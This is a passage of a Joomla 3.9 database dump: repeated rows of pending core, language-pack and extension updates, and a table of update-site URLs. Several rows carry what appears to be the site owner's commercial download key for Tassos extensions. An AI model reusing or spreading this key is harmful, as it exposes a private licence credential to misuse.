(2140, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(2141, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(2142, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(2143, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(2144, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(2145, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(2146, 3, 0, 'Arabic Unitag', '', 'pkg_ar-AA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ar-AA_details.xml', '', ''),
(2147, 3, 0, 'Catalan', '', 'pkg_ca-ES', 'package', '', 0, '3.9.11.2', '', 'https://update.joomla.org/language/details3/ca-ES_details.xml', '', ''),
(2148, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(2149, 3, 0, 'Croatian', '', 'pkg_hr-HR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/hr-HR_details.xml', '', ''),
(2150, 3, 0, 'Czech', '', 'pkg_cs-CZ', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/cs-CZ_details.xml', '', ''),
(2151, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(2152, 3, 0, 'Dutch', '', 'pkg_nl-NL', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/nl-NL_details.xml', '', ''),
(2153, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(2154, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(2155, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
(2156, 3, 0, 'Russian', '', 'pkg_ru-RU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ru-RU_details.xml', '', ''),
(2157, 3, 0, 'English AU', '', 'pkg_en-AU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-AU_details.xml', '', ''),
(2158, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(2159, 3, 0, 'English US', '', 'pkg_en-US', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-US_details.xml', '', ''),
(2160, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(2161, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(2162, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(2163, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(2164, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(2165, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(2166, 3, 0, 'Spanish', '', 'pkg_es-ES', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/es-ES_details.xml', '', ''),
(2167, 3, 0, 'Bosnian', '', 'pkg_bs-BA', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/bs-BA_details.xml', '', ''),
(2168, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
(2169, 3, 0, 'Finnish', '', 'pkg_fi-FI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fi-FI_details.xml', '', ''),
(2170, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(2171, 3, 0, 'English CA', '', 'pkg_en-CA', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-CA_details.xml', '', ''),
(2172, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
(2173, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(2174, 3, 0, 'Spanish CO', '', 'pkg_es-CO', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/es-CO_details.xml', '', ''),
(2175, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(2176, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(2177, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(2178, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(2179, 3, 0, 'English NZ', '', 'pkg_en-NZ', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-NZ_details.xml', '', ''),
(2180, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(2181, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(2182, 14, 0, 'EngageBox', 'EngageBox', 'com_rstbox', 'component', '', 1, '3.5.1', '', 'https://static.tassos.gr/update/engagebox?type=.xml', 'https://www.tassos.gr/update/engagebox?view=Items&release_id=524', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(2183, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.4.0', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=525', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(2184, 18, 0, 'JCE 2.7.17', '', 'pkg_jce', 'package', '', 0, '2.7.17', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-17-released', ''),
(2185, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(2186, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(2187, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(2188, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(2189, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(2190, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(2191, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(2192, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(2193, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(2194, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(2195, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(2196, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(2197, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(2198, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(2199, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(2200, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(2201, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(2202, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(2203, 3, 0, 'Arabic Unitag', '', 'pkg_ar-AA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ar-AA_details.xml', '', ''),
(2204, 3, 0, 'Catalan', '', 'pkg_ca-ES', 'package', '', 0, '3.9.11.2', '', 'https://update.joomla.org/language/details3/ca-ES_details.xml', '', ''),
(2205, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(2206, 3, 0, 'Croatian', '', 'pkg_hr-HR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/hr-HR_details.xml', '', ''),
(2207, 3, 0, 'Czech', '', 'pkg_cs-CZ', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/cs-CZ_details.xml', '', ''),
(2208, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(2209, 3, 0, 'Dutch', '', 'pkg_nl-NL', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/nl-NL_details.xml', '', ''),
(2210, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(2211, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(2212, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
(2213, 3, 0, 'Russian', '', 'pkg_ru-RU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ru-RU_details.xml', '', ''),
(2214, 3, 0, 'English AU', '', 'pkg_en-AU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-AU_details.xml', '', ''),
(2215, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(2216, 3, 0, 'English US', '', 'pkg_en-US', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-US_details.xml', '', ''),
(2217, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(2218, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(2219, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(2220, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(2221, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(2222, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(2223, 3, 0, 'Spanish', '', 'pkg_es-ES', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/es-ES_details.xml', '', ''),
(2224, 3, 0, 'Bosnian', '', 'pkg_bs-BA', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/bs-BA_details.xml', '', ''),
(2225, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
(2226, 3, 0, 'Finnish', '', 'pkg_fi-FI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fi-FI_details.xml', '', ''),
(2227, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(2228, 3, 0, 'English CA', '', 'pkg_en-CA', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-CA_details.xml', '', ''),
(2229, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
(2230, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(2231, 3, 0, 'Spanish CO', '', 'pkg_es-CO', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/es-CO_details.xml', '', ''),
(2232, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(2233, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(2234, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(2235, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(2236, 3, 0, 'English NZ', '', 'pkg_en-NZ', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-NZ_details.xml', '', ''),
(2237, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(2238, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(2239, 14, 0, 'EngageBox', 'EngageBox', 'com_rstbox', 'component', '', 1, '3.5.1', '', 'https://static.tassos.gr/update/engagebox?type=.xml', 'https://www.tassos.gr/update/engagebox?view=Items&release_id=524', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(2240, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.4.0', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=525', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(2241, 18, 0, 'JCE 2.7.17', '', 'pkg_jce', 'package', '', 0, '2.7.17', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-17-released', ''),
(2242, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(2243, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(2244, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(2245, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(2246, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(2247, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(2248, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(2249, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(2250, 3, 0, 'Arabic Unitag', '', 'pkg_ar-AA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ar-AA_details.xml', '', ''),
(2251, 3, 0, 'Catalan', '', 'pkg_ca-ES', 'package', '', 0, '3.9.11.2', '', 'https://update.joomla.org/language/details3/ca-ES_details.xml', '', ''),
(2252, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(2253, 3, 0, 'Croatian', '', 'pkg_hr-HR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/hr-HR_details.xml', '', ''),
(2254, 3, 0, 'Czech', '', 'pkg_cs-CZ', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/cs-CZ_details.xml', '', ''),
(2255, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(2256, 3, 0, 'Dutch', '', 'pkg_nl-NL', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/nl-NL_details.xml', '', ''),
(2257, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(2258, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(2259, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
(2260, 3, 0, 'Russian', '', 'pkg_ru-RU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ru-RU_details.xml', '', ''),
(2261, 3, 0, 'English AU', '', 'pkg_en-AU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-AU_details.xml', '', ''),
(2262, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(2263, 3, 0, 'English US', '', 'pkg_en-US', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-US_details.xml', '', ''),
(2264, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(2265, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(2266, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(2267, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(2268, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(2269, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(2270, 3, 0, 'Spanish', '', 'pkg_es-ES', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/es-ES_details.xml', '', ''),
(2271, 3, 0, 'Bosnian', '', 'pkg_bs-BA', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/bs-BA_details.xml', '', ''),
(2272, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
(2273, 3, 0, 'Finnish', '', 'pkg_fi-FI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fi-FI_details.xml', '', ''),
(2274, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(2275, 3, 0, 'English CA', '', 'pkg_en-CA', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-CA_details.xml', '', ''),
(2276, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
(2277, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(2278, 3, 0, 'Spanish CO', '', 'pkg_es-CO', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/es-CO_details.xml', '', ''),
(2279, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(2280, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(2281, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(2282, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(2283, 3, 0, 'English NZ', '', 'pkg_en-NZ', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-NZ_details.xml', '', ''),
(2284, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(2285, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(2286, 14, 0, 'EngageBox', 'EngageBox', 'com_rstbox', 'component', '', 1, '3.5.1', '', 'https://static.tassos.gr/update/engagebox?type=.xml', 'https://www.tassos.gr/update/engagebox?view=Items&release_id=524', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(2287, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.4.0', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=525', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(2288, 18, 0, 'JCE 2.7.17', '', 'pkg_jce', 'package', '', 0, '2.7.17', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-17-released', ''),
(2289, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(2290, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(2291, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(2292, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(2293, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(2294, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(2295, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(2296, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(2297, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(2298, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(2299, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.12', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(2300, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.12', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', '');

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_update_sites`
--

CREATE TABLE `y57u5_update_sites` (
  `update_site_id` int(11) NOT NULL,
  `name` varchar(100) COLLATE utf8mb4_unicode_ci DEFAULT '',
  `type` varchar(20) COLLATE utf8mb4_unicode_ci DEFAULT '',
  `location` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `enabled` int(11) DEFAULT '0',
  `last_check_timestamp` bigint(20) DEFAULT '0',
  `extra_query` varchar(1000) COLLATE utf8mb4_unicode_ci DEFAULT ''
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci COMMENT='Update Sites';

--
-- Dumping data for table `y57u5_update_sites`
--

INSERT INTO `y57u5_update_sites` (`update_site_id`, `name`, `type`, `location`, `enabled`, `last_check_timestamp`, `extra_query`) VALUES
(1, 'Joomla! Core', 'collection', 'https://update.joomla.org/core/sts/list_sts.xml', 1, 1569378071, ''),
(3, 'Accredited Joomla! Translations', 'collection', 'https://update.joomla.org/language/translationlist_3.xml', 1, 1569127889, ''),
(4, 'Joomla! Update Component Update Site', 'extension', 'https://update.joomla.org/core/extensions/com_joomlaupdate.xml', 1, 1569127889, ''),
(5, 'WebInstaller Update Site', 'extension', 'http://appscdn.joomla.org/webapps/jedapps/webinstaller.xml', 1, 1569127889, ''),
(11, 'K2 Updates', 'extension', 'http://getk2.org/app/update.xml', 1, 1569127892, ''),
(13, 'WebInstaller Update Site', 'extension', 'https://appscdn.joomla.org/webapps/jedapps/webinstaller.xml', 1, 1569127893, ''),
(14, 'Engage Box', 'extension', 'https://static.tassos.gr/update/engagebox?type=.xml', 1, 1569127896, 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(15, 'System - Novarain Installer', 'extension', 'https://static.tassos.gr/update?type=.xml', 1, 1569127896, 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(17, 'Convert Forms', 'extension', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 1, 1569127897, 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(18, 'JCE Editor Package', 'collection', 'https://cdn.joomlacontenteditor.net/updates/xml/pkg_jce.xml', 1, 1569127899, ''),
